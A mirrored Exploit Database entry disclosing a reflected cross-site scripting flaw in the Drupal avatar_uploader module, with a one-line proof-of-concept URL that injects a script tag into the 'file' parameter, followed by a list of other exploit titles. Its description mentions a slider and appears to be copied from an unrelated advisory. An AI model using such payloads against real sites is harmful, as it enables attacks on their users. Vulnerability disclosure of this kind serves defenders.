Drupal avatar_uploader v7.x-1.0-beta8 – Cross Site Scripting (XSS)

Exploit Database
17 阅读

作者： Milad karimi

日期： 2022-03-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/50841/

# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
# Date: 2022-03-22
# Author: Milad karimi
# Software Link: https://www.drupal.org/project/avatar_uploader
# Version: v7.x-1.0-beta8
# Tested on: Windows 10
# CVE: N/A

1. Description:
This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script>

last Exploits
Drupal avatar_uploader v7.x-1.0-beta8 – Cross Site Scripting (XSS)的更多信息

Easy Banner 2009.05.18 – ‘/member.php’ Multiple SQL Injection / Authentication Bypass：
Drupal avatar_uploader v7.x-1.0-beta8 – Arbitrary File Disclosure：
101 News 1.0 – Multiple-SQLi：
Telesquare SKT LTE Router SDT-CS3B1 – Information Disclosure：
WordPress Theme Epic – ‘download.php’ Arbitrary File Download：
News Script PHP 1.2 – Multiple Vulnerabilities：
Revive Adserver 4.2 – Remote Code Execution：
Itech Job Portal Script 9.13 – Multiple Vulnerabilities：